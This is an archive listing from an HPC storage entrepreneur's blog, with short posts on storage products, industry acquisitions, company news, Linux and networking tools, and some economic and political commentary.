I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk who might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
Selling #HPC things on ebay
Given that the (now former) day job has ended, I am selling some of the old day job’s assets on ebay. We’ve sold some siFlash, Unison, and have current listings for Arista and Mellanox switches. More stuff will be listed in short order, check it out here. Feel free to reach out to me at joe.landman at the google mail thingy if you want to talk about any of these things, or buy before I list them.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency
* 45GBps read bandwidth
* 15GBps write bandwidth
* 7 million IOPS
But then … a fibre connection.
Posts
Some updates coming soon
I should have something interesting to talk about over the next two weeks, though the summary is that Scalable Informatics is undergoing a transformation. The exact form of this transformation is still being determined. In any case, I am no longer at Scalable. Some items of note in recent weeks.
M&A: Nimble was purchased by HPE. Not sure of the specifics of “why”, other than HPE didn’t have much in this space.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
They mention Axellio, and in The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And it really wasn’t us, but my buddy Dr. James Cuff of Harvard.
Posts
SSD/flash/memory shortage, day N+1
There has been a huge demand for SSD/Flash/memory components from a number of end users. Sadly not the day job’s customers … but enough to deplete the market of supply. Watching basic economics at work is fascinating. Supply is highly constrained, while demand is rising. Coupling that with a (mis)expectation of continuously falling prices across the board leads to interesting conversations with customers. We’ve tried to set expectations appropriately, but we’ve been bitten in the past by doing just this.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. Flocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And it’s very hard to outcompete something like k8s.
Posts
Violin files for Chapter 11
This has been long in coming. I feel for the people involved. Violin makes proprietary flash modules and chassis, to provide an all flash “array”. The performance is somewhat “meh”, and the cost is high. Like most of the rest of the companies in this space, their latest model bits are quite a bit below Scalable’s 4 year old models, never mind the new stuff. Since the IPO, they’ve been on something of a monotonic down-direction in share price.
Posts
So it seems Java is not free
This article on The Register indicates that Oracle is now working actively to monetize Java use. Given the spate of Java hacks over the years, and the decidedly non-free nature of the language, I suspect we are going to see replacement development language use skyrocket, as people develop in anything-but-Java going forward. Think about the risks … you have a massive platform that people have been using with a fairly large number of compromises (client side certainly) … and now you need to start paying for the privilege of using the platform.
Posts
On closure
I work with many people, have regular email and phone contact with them, as well as occasional face to face meetings. We talk ideas back and forth, develop plans. I work on designs, coordinating everything that goes into those designs (usually built upon our kit). I work hard on my proposals, thinking many things through, developing very detailed plans. I share these with the people … our customers. And then the pinging begins.
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If it’s slow, IMO, it’s a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
Excellent article on mistakes made for infrastructure ... cloud jail is about right
Article is here at First Round Capital. This goes to a point I’ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don’t work. We’ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.). Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really … really grok what is going on.
Posts
Seagate and ClusterStor: a lesson in not jumping to conclusions based on what was not said
I saw this analysis this morning on the Register’s channel site. This follows on the announcement of other layoffs and shuttering of facilities. A few things. First a disclosure: arguably, the day job and more specifically our Unison product is in “direct” competition with ClusterStor, though we never see them in deals. This may or may not be a bad thing, and likely more due to market focus (we do big data, analytics, insanely fast storage in hyperconverged packages) than anything else.
Posts
M&A: Vertical integration plays
Two items of note here. First, Cavium acquires QLogic. This is interesting at some levels, as QLogic has been a long time player in storage (and networking). There are many QLogic FC switches out there, as well as some older InfiniBand gear (pre-Intel sale). Cavium is more of a processor shop, having built a number of interesting SoCs and general purpose CPUs. I am not sure the combo is going to be a serious contender to Intel or others in the data center space, but I think they will be working on carving out a specific niche.
Posts
Attempting, and to some degree, failing, to prevent a user from accruing technical debt
We strive to do right by our customers. Sometimes this involves telling them unpleasant truths about choices they are going to make in the future, or have made in the past. I try not to overly sugar coat things … I won’t be judgemental … but I will be frank, and sometimes, this doesn’t go over well. During these discussions, I often see people insisting that their goal is X, but the steps Y to get there, will lead them to Z, which is not coincident with X.
Posts
"No, really, we are different than all the others you worked with"
Thus ended the plaintive cry of a management consultant hawking their wares, promising us high level meetings with “customers” with “budgets” in our space. This isn’t to say we don’t want more customers, we do. We always need more (and repeat) customers … this is the nature of our business. What we don’t need is pay-for-play. There is no shared risk, no incentive for the management consultant to deliver a set of business, as they are being paid, and that … the pay for play, is their business.
Posts
VC landscape changing: Intel Capital on the market
Saw this in a post on VentureBeat. Intel Capital has been an important player in the space for a while. What happens next to them is worth paying attention to. They’ve been in the thick of many interesting companies, though usually outside of Intel’s core foci. Somewhat beyond the normal corporate strategic VC roles. This could change a number of things for startups … new and existing. VCs have been sitting on the sidelines, or being less active over the recent past, and this is likely not to help the situation.
Posts
Nutanix files for IPO
Short story here. I am not going to pore over their S-1 form to find interesting tidbits, others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of the price for them, plus the EMC acquisition stopped this conversation. So now Nutanix is going to IPO.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com. You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison)
* 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system
* 100Gb connection to a partner/customer booth
* Forte
100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
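To put the 20GB/s figure in context, here is a small back-of-the-envelope calculation in Python. It rests on assumptions not stated in the post: that "100Gb" means 100 gigabits per second in each direction, that units are decimal, and that the 20GB/s is the sum of both directions. The function names are made up for the illustration.

```python
def line_rate_gbytes_per_s(link_gbits_per_s, directions=1):
    """Raw line rate in GB/s: 8 bits per byte, summed over directions."""
    return link_gbits_per_s / 8 * directions


def utilization(observed_gbytes_per_s, link_gbits_per_s, directions=1):
    """Fraction of the raw line rate that an observed throughput represents."""
    return observed_gbytes_per_s / line_rate_gbytes_per_s(
        link_gbits_per_s, directions
    )


if __name__ == "__main__":
    one_way = line_rate_gbytes_per_s(100)        # single direction
    both_ways = line_rate_gbytes_per_s(100, 2)   # bidirectional aggregate
    frac = utilization(20, 100, directions=2)    # assumed aggregate reading
    print(f"one way:   {one_way} GB/s")
    print(f"both ways: {both_ways} GB/s")
    print(f"20 GB/s is {frac:.0%} of the bidirectional line rate")
```

Under those assumptions the raw ceiling is 12.5 GB/s each way and 25 GB/s combined, so 20GB/s would be about 80% of line rate before accounting for any protocol overhead.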
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
* Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture
* Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances
* Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance
* Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance
* Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
Are the wheels coming off?
From Term Sheet (required reading BTW)
Read it all. The thing about bubble valuations and unicorns … neither one will last very long. Pure Storage IPOed this week and they aren’t doing as well in the public markets as their private market valuations might suggest. This is not to say they aren’t a good company, or don’t have a good product. This is saying that the demand for “unicorn” valuations from the buy side is … well … weak.
Posts
Voting in HPCWire's readers choice awards are open, please vote!
Our friends at Lucera are in number 6 for best use of HPC in a financial services category. Our Unison product is at number 11 for Best HPC Storage Product or Technology. And I did a write in for #21 for us :D. Our friends at Mellanox have their 100Gb EDR Infiniband technology at number 14. Please do vote (early, not often).
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
Scalable Informatics 13th year anniversary on Saturday
We started the company on 1-August-2002. I remember arguing with a senior VP at SGI over his decision to abandon linux clusters in Feb 2001. That was the catalyst for me leaving SGI, but I was too chicken to start Scalable then. I thought I could do better than them. I went to another place for 15 months or so. Tried jumpstarting an HPC group there … hired lots of folks, pursued lots of business.
Posts
M&A fallout: Cisco may have ditched Invicta after buying Whiptail
Article is here, take it as a rumor until we hear from them. My comments: First, M&A is hard. You need a good fit product wise (little overlap and great complementary functions/capabilities), and culture/people fit matters. Second, sales teams need to be on-board selling complete solutions involving the acquired tech. Sometimes this doesn’t happen, for any number of reasons, some fixable, some not. Third, Cisco is out of the storage game if this is true.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
M&A or more correctly, acqui-hire: Cray bags much of Terascala
Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales. Put their code upon their partners’ hardware. This did generate more force multipliers for them in sales, but it cost them some of their differentiation … unless their boxes were entirely undifferentiated, where it would reduce their overall costs to avoid selling undifferentiated hardware.
Posts
Potential M&A: Micron being pursued
I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential that is)? Well, there are 4 basic Flash fabs out there these days.
Posts
M&A [RUMOR]: Cisco grabs Nutanix
[update] TL;DR this appears to be rumor/speculation. One would think that such an acquisition would be prominent on Nutanix’s web site. It’s April Fools, in May. /sigh
Huge in the hyperconverged space (which, not so curiously, is where the day job is), and it’s setting up the battle lines between the major software/hardware players. Cisco was already number 5 hardware vendor, and was bragging about “beating the white boxes”. The last may be more wishful thinking than reality.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
Memory channel flash: is it over?
[full disclosure: day job has a relationship with Diablo] Russell just pointed this out to me. The short (pedestrian) version (I’ve got no information that is not public, so I can’t disclose something I don’t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk as they bought Smart Storage, who worked with Diablo prior to Smart being acquired by SanDisk. Netlist appears to have won an, at least temporary, injunction against Diablo.
Posts
M&A in our space
The day job’s products have never been stronger, fit together as well, or had as great a story arc as they do today. We can deliver denser, faster, easier to setup and manage systems quite easily. Our application stacks run atop this system on our ample computing power, and we provide massive network pipes in/out, as data motion is hard. Many more cool things are coming, but for now, we are working very hard on building something awesome.
Posts
Why doesn't linkedin make removing a contact easy?
I don’t get this. Yeah, sure, your contacts are curated, and I don’t accept everyone. I need to see some aspect of a connection and be pretty sure they won’t spam me personally or try to spam my contacts. So when I find out that this is what happens, I want to block their access to me. Which usually means un-connecting with them. So why does LinkedIn make this effectively impossible on the phone apps?
Posts
[Update] debunked ... (was IBM layoffs to hit 25% or so of the company)
[Update] As I had wondered, and others suggested to me, this number (25%) was likely a click bait fabrication. Forbes and others also “fell for it.” I’ll admit I did as well. It was too large to ignore, but it also didn’t make sense. Close down mainframe and storage? Seriously? Let’s call this what it is, an internet rumor that was busted. Paraphrasing Mark Twain “An internet rumor can travel around the world while the truth is still putting on its shoes”.
Posts
Inventory reduction @scalableinfo
It’s that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
* 16-24 processor cores
* 128 GB RAM
* 48x {2,3,4} TB top mount drives
* 4x rear mount SSDs (OS/metadata cache)
* Scalable OS (Debian Wheezy based Linux OS)
* 3 year warranty
As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Learning to respect my gut feelings again
A “gut feeling” is, at a deep level, a fundamental sense of something that you can’t necessarily ascribe metrics to, you can’t quantify exactly. It’s not always right. It’s a subconscious set of facts, ideas, concepts that seem to suggest something below the analytical portion of your mind, and it could bias you into a particular set of directions. Or you could take it as an aberration and go with “facts”.
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
HP to split up
Interesting changes in the corporate M&A or disaggregation arena. With M&A, you are looking to build market strength by acquiring valuable IP, assets, brands, names, teams, capabilities, trade secrets, special sauces, etc. You do that to make your group stronger and more capable of handling the challenges ahead. With a disaggregation, you slice off disparate portions of the business, and set them free to pursue their own path. This is what was rumored a few weeks ago with EMC, a possible split of the federated businesses.
Posts
Interesting bits around EMC
In the last few days, issues around EMC have become publicly known. EMC is the world’s largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession “process” going on. Couple this to a fundamental shift in storage, from arrays to distributed tightly coupled server storage, such as Unison, which is problematic for their core business.
Posts
An article on Detroit that is worth the read
Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn’t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.
Posts
Definition of vacation
… appears to be normal working hours from a location that is not your office, home … I am supposed to be on vacation. A short one, as there are simply far too many things on my plate (notice my recent posting frequency?). Instead, I am trying to solve problems for customers, sign NDAs, handle support calls. What was the purpose of vacation or holiday again? I keep forgetting.
Posts
Comcast finally fixed their latency issue
This has been a point of contention for us for years. Our office has multiple network attachments, and Comcast is one of them. This is the main office, not the home office. Latency on the link, as measured by DNS pings, has always been fairly high, in the 2-3ms region, as compared to our other connection (using a different provider and a different technology), which has been consistently 0.5ms for the last 2 years.
Posts
M&A: PLX snarfed by ... Avago ?
Ok, didn’t see this acquirer coming, but PLX being bought … yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there who will tell you that it’s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Calxeda restructures
The day job had been talking to and working with Calxeda for a while. They’ve been undergoing some changes over the last few months as they worked to transition from an evangelist to a systems builder. The day job just got a note that they are restructuring. What this specifically means to an outsider, I am not sure, though I could speculate. HP has a vested interest in them. I wouldn’t be surprised to see a rapid asset acquisition.
Posts
Violin kicks out founding CEO
Story at The Register. Usually you give a CEO some time to right a listing ship. I pointed out in a recent post that there are some significant grumblings about Violin and in fact about most of the flash-as-rack-appliance space. I had noted
We’ve run into them a few times in competitive situations, so take what I write about them with an appropriate mass of NaCl. All the pure-play flash array vendors have to answer a basic question about their existence.
Posts
Oh dear lord
Let’s see if this actually materializes. It’s pretty obvious how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition could be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straightforward definition in the US Constitution.
Posts
Part of the reason why Detroit has a long rough road ahead
is due, in significant part, to bad law and bad policy enshrined in law. Ideological view points are hard coded in the firmware of Michigan. Which allows lawsuits and results such as this. It cannot be overemphasized how bone-headed this particular law is. That one can never, under any circumstances, reduce pensioner benefit values. This means, if you ever struck a bad deal, like Detroit, and many others in Michigan have, you have no choice but to continue this bad deal for eternity.
Posts
... and bang goes Detroit ...
This brings me no joy. I went to grad school in Detroit. I like this city. It has character, it has guts, it has potential. It also has no cash to continue operations. And that sucks. Detroit filed for chapter 9 bankruptcy a few hours ago. There are many reasons for this, but there are a number of specific ones, that are generalizable to businesses as well. First, population decline has led to a tax revenue decline.
Posts
That's what now ... 5 live scandals?
[Update] That didn’t take long. Looks like the government is angry about all of this. The leak of the leaks that is. And they are going to try to find the culprit, and prosecute them. Any “Mea Culpas” from them on the fact that this is … I dunno … illegal? Er … no. Most transparent admin … evuh??? I read something last week which made me laugh. It read “tomorrow is Thursday, time for a new scandal”.
Posts
Don't know if I mentioned it, but the day job has a new website
Take a gander. Some things are missing, and our marketing folks are developing the content where needed, and revising it where we have existing content. It’s quite refreshing to see this. It will get better over time. It’s running in our facility now, and likely we’ll have a few clones in the cloud as well. But that’s for later.
Posts
#youknowyouaretravelingwaytoomuchwhen ...
… the guy driving the car rental bus recognizes you and talks about how often you’ve been there.
Category: cloud
Posts
Looking forward to #SC18 next week and a discussion of all things #HPC
I’m attending SC18 next week. It’s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.
Posts
Finally got to use MCE::* in a project
There are a set of modules in the Perl universe that I’ve been looking for an excuse to use for a while. They are the MCE set of modules, which purportedly enable easy concurrency and parallelism, exploiting many core CPUs, and a number of techniques. Sure enough, I had a task to handle recently that required this. I looked at many alternatives, and played with a few, including Parallel::Queue. I thought of writing my own with IPC::Run as I was already using it in the project, but I didn’t want to lose focus on the mission, and re-invent a wheel that already existed elsewhere.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from statically linking programs to more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And it’s available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. It’s not quite an exact description, have a look at Kx’s website for a more accurate one.
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
"Unexpected" cloud storage retrieval charges, or "RTFM"
An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon’s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
Updated net-tools bits
So far, 3 components, and working to fix a few things in formatting. On github, grab it here. First, lsbond.pl to report about bond details
root@unison-mgr-1:~/net-tools# ./lsbond.pl
bond0: mac 0c:c4:7a:48:69:cb state up mode fault-tolerance (active-backup) xmit_hash layer2 0 active slave eth1 polling 100 ms up_delay 200 ms down_delay 200 ms
  slave nics:
    eth1: mac 0c:c4:7a:48:69:cb, link 1, state up, speed 1000, driver igb, version 5.3.2.2 firmware version 1.61,0x8000090e
bond1: mac 00:12:c0:80:26:76 state up mode fault-tolerance (active-backup) xmit_hash layer2 0 active slave eth3 polling 100 ms up_delay 200 ms down_delay 200 ms
  slave nics:
    eth2: mac 00:12:c0:80:26:76, link 1, state up, speed 10000, driver ixgbe, version 4.
Posts
The world’s fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in as minimal a footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, or integrate them into a larger FastPath Unison system. We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those who don’t know what this is, think of it this way.
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Here’s why.
Swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
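The "increases your failure likelihood" point can be put in numbers. This is only a sketch: the failure probabilities below are made up for illustration (they are not measurements from the post), and it assumes the components fail independently and that the path breaks if any one of them does.

```python
def path_failure_probability(component_failure_probs):
    """Probability that at least one component in a serial path fails,
    assuming independent failures."""
    survive = 1.0
    for p in component_failure_probs:
        survive *= (1.0 - p)
    return 1.0 - survive


# Hypothetical per-year failure probabilities, for illustration only.
RAM_ONLY = [0.01]                 # pages live only in memory
RAM_PLUS_SWAP_DISK = [0.01, 0.03] # pages may also live on a swap device

ram_only = path_failure_probability(RAM_ONLY)
with_swap = path_failure_probability(RAM_PLUS_SWAP_DISK)

print(f"RAM only:        {ram_only:.4f}")
print(f"RAM + swap disk: {with_swap:.4f}")
```

Whatever the real numbers are, adding a component to a path that assumes no failure can only push the combined failure probability up, never down.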
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000
Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. It’s way too freaking simple.
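Why one missing newline matters is easy to show with any line-oriented receiver. The code from the post isn't shown, so this is not it; it is a minimal sketch with hypothetical function names and a made-up record, assuming the receiving side treats `\n` as the record terminator.

```python
def split_complete_lines(buffer: bytes):
    """Split a receive buffer into complete newline-terminated records
    plus whatever partial record is left over."""
    *lines, remainder = buffer.split(b"\n")
    return lines, remainder


def frame(record: str) -> bytes:
    """Encode a record and guarantee exactly one trailing newline."""
    return record.rstrip("\n").encode("utf-8") + b"\n"


# Hypothetical record, for illustration only.
record = "host.cpuload.avg1 0.42"

# Sent without a newline: the receiver never sees a complete record.
lines, pending = split_complete_lines(record.encode("utf-8"))
print(lines, pending)

# Sent with a newline: one complete record, nothing left pending.
lines_ok, pending_ok = split_complete_lines(frame(record))
print(lines_ok, pending_ok)
```

Routing every outgoing record through something like `frame()` makes it hard to forget the terminator, which is the sort of layer 8 mistake the post describes.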
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t show the formatting of the output quite right. Will try to fix over the weekend, as I move this to a far more feature complete state.
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics
metrics> \list series
.----------------------------------.
| series name                      |
+----------------------------------+
| lightning.cpuload.avg1           |
| lightning.cputotals.idle         |
| lightning.cputotals.irq          |
| lightning.
Posts
Be on the lookout for 'pauses' in CentOS/RHEL 6.5 on Sandy Bridge
Probably on Ivy Bridge as well. Short version. The pauses that plagued Nehalem and Westmere are baaaack. In RHEL/CentOS 6.5 anyway. A customer just ran into one. We helped diagnose/work around this a few years ago when a hedge fund customer ran into this … then a post-production shop … then … Basically the problem came in from the C-states. The deeper the sleep state, in some instances, the processor would not come out of it, or get stuck in the lower levels.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there who will tell you that it’s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
Yay, latest Java update broke Supermicro remote console
JRE 7 u 51. Self signed Java console applet. Let the hilarity begin. I tried uploading our own cert and key to the unit. No luck. It’s the applet that needs to be re-signed. This is the joyous message that awaits:
Of course, the IPMIview tool sorta kinda works. Though it’s useless for remote support ops. Doesn’t set off the signed issue. Mebbe they ignore signing? Which is worse … the self signed cert, or the sign ignoring app.
Posts
More blurring of lines between platform providers and competitors
I had pointed out recently that large platform as a service, or pretty much any *aaS type model, where you present your value atop someone else’s platform, leveraging their technologies, is ripe for having the *aaS provider decide they want to move into your space. Once you’ve done the hard work of proving there is a space in the first place. Well, the Register has an article on this now. I gave a number of specific examples, and pointed out that Amazon isn’t the first to do this, Microsoft had previously done this to the level of an art form.
Posts
... and the positions are now, finally open ...
